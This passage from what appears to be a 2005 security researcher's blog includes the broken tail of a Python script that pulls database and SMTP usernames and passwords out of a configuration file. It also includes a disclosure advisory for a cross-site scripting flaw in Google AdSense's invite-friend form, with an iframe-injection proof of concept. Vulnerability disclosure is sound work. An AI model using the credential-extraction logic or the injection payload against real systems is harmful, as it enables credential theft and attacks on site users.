n=n+1
n=0
print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'
while n if (string.find(lineas[n],'driver : string '))==0:
imprime=string.replace(lineas[n],'driver : string ','Tipo')
print imprime
if (string.find(lineas[n],'server : string '))==0:
imprime=string.replace(lineas[n],'server : string ','Servidor ')
print imprime
if (string.find(lineas[n],'user : string '))==0:
imprime=string.replace(lineas[n],'user : string ','Usuario ')
print imprime
if (string.find(lineas[n],'password : string '))==0:
imprime=string.replace(lineas[n],'password : string ','Passwd ')
print imprime
if (string.find(lineas[n],'database : string '))==0:
imprime=string.replace(lineas[n],'database : string ','Base de datos ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'
while n if (string.find(lineas[n],'checkout_email : string '))==0:
imprime=string.replace(lineas[n],'checkout_email : string ','Email
del admin ')
print imprime
if (string.find(lineas[n],'from_name : string '))==0:
imprime=string.replace(lineas[n],'from_name : string ','Nombre')
print imprime
if (string.find(lineas[n],'smtp_host : string '))==0:
imprime=string.replace(lineas[n],'smtp_host : string ','Host ')
print imprime
if (string.find(lineas[n],'smtp_username : string '))==0:
imprime=string.replace(lineas[n],'smtp_username : string ','Usuario ')
print imprime
if (string.find(lineas[n],'smtp_password : string '))==0:
imprime=string.replace(lineas[n],'smtp_password : string ','Passwd ')
print imprime
n=n+1

if len(sys.argv)==3:
leeini(sys.argv[1],sys.argv[2])
os.remove('tmp.txt')
else:
uso()

####################### end ##############

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to icaro he is with me and investigate.

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

Google AdSense invite-friend multiple field XSS

Sunday, May 01, 2005
####################################################
Google AdSense invite-fiend multiple field XSS
vendor url:https://www.google.com/adsense/
advisore: http://lostmon.blogspot.com/2005/05/
google-adsense-invite-friend-multiple.html
vendor notify : yes exploit available:yes
#####################################################

Google AdSense is a fast and easy way for website publishers of all
sizes to display relevant Google ads on their website's content
pages and earn money

Google AdSense contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly ' Your friend's name',' Your name' ,'Your
email address' and 'Add a personal message' fields upon
submission to the 'previewInvitation()' Function in '/adsense/invite-friend'
scripts.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading to a
loss of integrity.

#############
tieline:
#############
discovered: 1 may 2005
vendor notified: 2 may 2005
vendor response: 2 may 2005 ( autoresponder)
vendor response:
fix: not fixed !!!!
disclosure: 5 may 2005

###################
software used
##################

windows 2000 sp4 all fixes
ie 6.0 all fixes
google toolbar 2.0.114.9 big/es
Netcraft toolbar 1.4.1

#################
proof of concept:
#################

Image Example

Go to this address https://www.google.com/adsense/invite-friend
ans insert in fields listed for example:
"><iframe src=http://www.google.com><iframe>
and click in 'preview invite text' link , the iframe is executed
in the texarea on show a preview of the invite with this we can
exploit ' Your friend's name',' Your name' ,'Your email address'
and 'Add a personal message' form fields.

WARNING !!! IF WE LOOK WE ARE IN HTTPS PROTOCOL !!!!!!

(Yet another) Google Cross Site Scripting

############### End ####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...